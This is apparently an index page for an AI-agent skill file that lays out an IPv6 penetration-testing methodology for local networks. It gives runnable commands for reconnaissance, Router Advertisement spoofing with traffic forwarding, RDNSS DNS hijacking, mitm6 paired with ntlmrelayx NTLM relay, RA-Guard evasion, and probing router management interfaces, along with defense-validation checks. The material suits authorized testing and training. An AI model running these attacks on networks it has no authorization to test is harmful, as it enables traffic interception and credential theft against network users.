OpenSkillIndex← back to search

Hacktricks-skills ipv6-pentest

IPv6 penetration testing methodology for local network assessments. Use this skill whenever the user mentions IPv6 pentesting, network reconnaissance, link-local attacks, RA spoofing, DHCPv6 attacks, NDP discovery, or any IPv6 security testing. Trigger for tasks involving IPv6 address discovery, router advertisement manipulation, DNS hijacking via RDNSS, or guest network exploitation.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6/SKILL.MD
source content

IPv6 Penetration Testing

A comprehensive skill for conducting IPv6 security assessments on local networks. This skill covers reconnaissance, attack techniques, and defense validation for IPv6-enabled environments.

When to Use This Skill

Use this skill when:

  • Performing network reconnaissance on IPv6-enabled networks
  • Testing link-local attack vectors (RA spoofing, RDNSS, DHCPv6)
  • Discovering IPv6 addresses and topology
  • Assessing IPv6 security controls (RA-Guard, DHCPv6 Guard)
  • Exploiting exposed management services over IPv6
  • Validating IPv6 hardening configurations

Core Concepts

IPv6 Address Structure

IPv6 addresses are 128-bit addresses divided into:

  • Network Prefix (48 bits): Network segment identifier
  • Subnet ID (16 bits): Specific subnet within the network
  • Interface Identifier (64 bits): Unique device identifier

Key Address Types

TypePrefixPurpose
Link-Local
fe80::/10
Local network communication only
Unique Local
fc00::/7
Private networks (like 10.x.x.x)
Global Unicast
2000::/3
Public internet routing
Multicast
ff00::/8
One-to-many communication
Loopback
::1
Internal host communication

Critical Multicast Addresses

  • ff02::1
    - All nodes on local link
  • ff02::2
    - All routers on local link
  • ff02::1:ffxx:xxxx
    - Solicited-node multicast

Reconnaissance Phase

Step 1: System Preparation

Before conducting IPv6 testing, harden your test system:

# Enable promiscuous mode for full packet capture
sudo ip link set dev <IFACE> promisc on

# Block rogue RAs and redirects to prevent self-poisoning
sudo sysctl -w net.ipv6.conf.all.accept_ra=0
sudo sysctl -w net.ipv6.conf.all.accept_redirects=0

# Increase limits for high-volume traffic
sudo sysctl -w fs.file-max=100000
sudo sysctl -w net.core.somaxconn=65535
sudo sysctl -w net.ipv4.tcp_tw_reuse=1

Step 2: Passive Discovery

Use the 

ipv6-sniffer.py
script to map the network without sending packets:

python3 ipv6-sniffer.py -i <IFACE> -t 60

This captures:

  • Neighbor Solicitation/Advertisement (NS/NA)
  • Router Solicitation/Advertisement (RS/RA)
  • DHCPv6 messages
  • MLD reports

Step 3: Active Discovery

# Ping multicast to trigger neighbor discovery
ping6 -I <IFACE> -c 5 ff02::1 > /dev/null 2>&1

# View discovered neighbors
ip -6 neigh

# Alternative: use alive6
alive6 <IFACE>

Step 4: Derive Link-Local from MAC

Given a MAC address, construct the link-local IPv6:

  1. Convert MAC to hex groups: 
    12:34:56:78:9a:bc
    1234:5678:9abc
  2. Insert 
    fffe
    : 
    1234:56ff:fe78:9abc
  3. Invert 7th bit of first octet: 
    1234
    1034
  4. Prepend 
    fe80::
    : 
    fe80::1034:56ff:fe78:9abc

Use the 

mac-to-ipv6.py
script for automation.

Step 5: DNS Reconnaissance

# Query AAAA records
dig AAAA <domain>

# Attempt zone transfer
dig AXFR @<nameserver> <domain>

# Broad ANY query
dig ANY <domain>

Attack Techniques

Router Advertisement (RA) Spoofing

RA spoofing hijacks the default gateway by sending forged Router Advertisements more frequently than the legitimate router.

Prerequisites:

  • Same /64 segment as targets
  • Ability to send packets on the interface

Execution:

python3 ra-spoof.py -i <IFACE> -m <YOUR_MAC> --llip fe80::dead:beef --interval 5

To forward traffic after winning:

sudo sysctl -w net.ipv6.conf.all.forwarding=1
sudo ip6tables -A FORWARD -i <IFACE> -j ACCEPT
sudo ip6tables -t nat -A POSTROUTING -o <IFACE> -j MASQUERADE

To revert the attack:

python3 ra-spoof.py -i <IFACE> -m <YOUR_MAC> --llip fe80::dead:beef --revert

Understanding RA Flags

Inspect legitimate RAs to determine attack vectors:

sudo tcpdump -vvv -i <IFACE> 'icmp6 and ip6[40]==134'
FlagMeaningAttack Implication
M=1DHCPv6 for addressesDHCPv6 spoofing viable
O=1DHCPv6 for other configDNS hijacking via DHCPv6
M=0, O=0Pure SLAACUse RDNSS spoofing instead

Router Preference (Prf):

  • High (
    10
    ): Clients prefer this router
  • Medium (
    01
    ): Default
  • Low (
    00
    ): Last resort

RDNSS (DNS) Spoofing

For SLAAC-only networks (M=0, O=0), use RDNSS to hijack DNS:

python3 rdns-spoof.py -i <IFACE> --llip fe80::dead:beef --dns <YOUR_DNS_IP> --interval 5

To revert:

python3 rdns-spoof.py -i <IFACE> --llip fe80::dead:beef --dns <YOUR_DNS_IP> --revert

DHCPv6 Spoofing with mitm6

When M or O flags are set, use mitm6 for DHCPv6-based attacks:

# DNS takeover without rogue RAs
sudo mitm6 -i <IFACE> --no-ra -d <domain> --host-allowlist <host>

# Pair with NTLM relay
sudo ntlmrelayx.py -6 -t ldaps://<target> -wh <wpad_server>

RA-Guard Evasion

If standard RA spoofing is blocked, try evasion techniques:

# Hop-by-Hop header variant
sudo atk6-fake_router6 -H <IFACE> 2001:db8:1337::/64

# Fragmentation variant
sudo atk6-fake_router6 -F <IFACE> 2001:db8:1337::/64

# Destination options variant
sudo atk6-fake_router6 -D <IFACE> 2001:db8:1337::/64

# Flooded variant with DHCPv6 flags
sudo atk6-flood_router26 -F -m <IFACE>

Guest Network Management Exploitation

Many routers expose management services on guest SSIDs:

Discovery:

# Send Router Solicitation
python3 - <<'PY'
from scapy.all import *
send(IPv6(dst='ff02::2')/ICMPv6ND_RS(), iface='<IFACE>')
PY

# Or use rdisc6
rdisc6 <IFACE>

Exploitation:

# SSH to management interface
ssh -6 admin@[fe80::1%<IFACE>]

# Web UI access
curl -g -6 -k 'http://[<ROUTER_IP>]/'

# Service sweep
nmap -6 -sS -Pn -p 22,23,80,443,7547 [<ROUTER_IP>]

Defense Validation

Check for RA-Guard

# Attempt normal RA spoofing
python3 ra-spoof.py -i <IFACE> -m <MAC> --llip fe80::dead:beef

# If blocked, try evasion variants
sudo atk6-fake_router6 -H <IFACE> 2001:db8:1337::/64

Check for DHCPv6 Guard

# Attempt DHCPv6 spoofing
sudo mitm6 -i <IFACE> --no-ra -d test.local

# Monitor for responses
sudo tcpdump -i <IFACE> 'udp port 546 or udp port 547'

Check for ND Inspection

# Attempt NS/NA spoofing
sudo arpspoof6 -i <IFACE> -t <TARGET> <GATEWAY>

# Monitor for detection
sudo tcpdump -i <IFACE> 'icmp6'

Best Practices

  1. Always test in a lab first - IPv6 behavior varies by OS and network equipment
  2. Document baseline behavior - Capture legitimate RAs before attacking
  3. Use allowlists - Scope attacks to specific hosts/domains to reduce noise
  4. Clean up properly - Always revert attacks with lifetime=0
  5. Monitor for detection - Watch for RA-Guard or IDS responses
  6. Validate client support - Not all OSes support RDNSS or respond to DHCPv6

Common Pitfalls

  • Self-poisoning: Always set 
    accept_ra=0
    before testing
  • Zone index required: Link-local connections need 
    %<IFACE>
    suffix
  • Firewall interference: Stop ufw/iptables before testing
  • Client OS differences: Windows, Linux, macOS handle IPv6 differently
  • RA-Guard false positives: Some switches filter legitimate traffic

References

Scripts

The following scripts are bundled with this skill:

  • ipv6-sniffer.py
    - Passive NDP/DHCPv6 traffic capture
  • ra-spoof.py
    - Router Advertisement spoofing
  • rdns-spoof.py
    - RDNSS DNS hijacking
  • mac-to-ipv6.py
    - MAC to link-local IPv6 conversion

Run each script with 

--help
for usage details.